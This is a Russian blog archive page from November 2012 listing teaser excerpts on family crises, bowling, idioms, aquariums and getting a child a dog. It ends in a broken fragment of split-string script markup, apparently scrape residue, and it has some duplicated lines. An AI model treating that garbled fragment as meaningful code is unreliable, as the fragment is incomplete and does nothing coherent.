Архив ноября, 2012

Критические периоды семейной жизни. Как сохранить брак?

Размещено в рубрике Отношения, Семейная психология

Не так давно одна из наших читательниц поделилась своей проблемой: «...сейчас у нас с мужем неприятный период в жизни ... прошли 7 лет и все... конец... брак на грани распада... что делать?» Поэтому сегодня я предлагаю читателям поговорить о так называемых «семейных кризисах».
Эта милая женщина далеко не единственная, кто столкнулся с тяжелым периодом совместного существования. [...]

Популярность: 79%

Читать запись полностью

Как играть в Кегли и в Боулинг? Правила и тонкости

Сегодня речь пойдет об одном из самых популярных увлечений людей всех возрастов – игре в боулинг. Кстати, когда в России еще только появились первые боулинг-клубы, то походы туда стали показателем определенной статусности: считалось, что игроки в боулинг — это люди определенного социального положения. Сегодня же поиграть в боулинг заходят и дети, которым удалось выпросить у родителей [...]

Популярность: 74%

Читать запись полностью

Аредовы веки, Аника-воин и Шемякин суд

Как вы уже, наверное, сами догадались, сегодня для разминки мозга мы будем вновь вспоминать с вами значения образных выражений, некоторые из которых достаточно популярны и в наши дни, а другие используются редко.
Согласитесь, употребляя по инерции, например, фразы «в Багдаде все спокойно» или «все разобрал по косточкам», мы не задумываемся о том, откуда, собственно, пришли в нашу [...]

Популярность: 55%

Читать запись полностью

Зануда в семье

Размещено в рубрике Отношения, Семейная психология

Интернет-энциклопедия «Википедия» дает такое определение зануде — надоедливый человек, тот, чьи действия вызывают тоску и раздражение. Прямо скажем, не очень приятный субъект вырисовывается! Такой человек не любит перемены, чаще всего пессимистичен, уверен в своей правоте, плохо идет на компромиссы. В небольших дозах зануд можно переносить без особого вреда для здоровья. Но все же, желательно, чтобы [...]

Популярность: 44%

Читать запись полностью

Аквариумная эпопея или Как лишиться покоя

Одним из занимательнейших и, причем древних, увлечений человечества была, есть и будет аквариумистика.
Кстати, во многих странах вместо этого термина вы услышите другой – фишкипинг (англ. Fishkeeping).
Между прочим, занятие это, если подойти к нему серьезно и ответственно, дает неограниченное поле деятельности, простор для фантазии и возможность значительно расширить свою эрудицию в выбранном направлении.
Популярность: 43%

Популярность: 43%

Читать запись полностью

Ребенок просит собаку. Заводить или не заводить?

«Хочу собаку!» Мало кто из родителей не сталкивался с подобной просьбой своего ребенка, да и в детстве почти все просили родителей купить им какую-нибудь живность. Как правило, ребенок воспринимает животное, как живую игрушку, с которой можно реально взаимодействовать, не учитывая бытовую сторону вопроса.
Популярность: 55%

Популярность: 55%

Читать запись полностью

Перевертыши. Упражнение на сообразительность и память

Вам никогда не приходилось сталкиваться с упражнениями, которые в литературе чаще всего называют «перевертыши»?
Быть может, в детстве взрослые играли с вами в «перевернутый мир», когда предметам и явлениям приписываются обратные свойства? Или вы сами развивали интеллект своих собственных детей посредством т.н. «игр ума», известных еще с древнейших времен?
Ну, или, на худой конец, читали с ними [...]

Популярность: 59%

Читать запись полностью

 Страница 1 из 2  1  2 »
undefined'+'/scr'+'ipt'+'/scr'+'ipt width=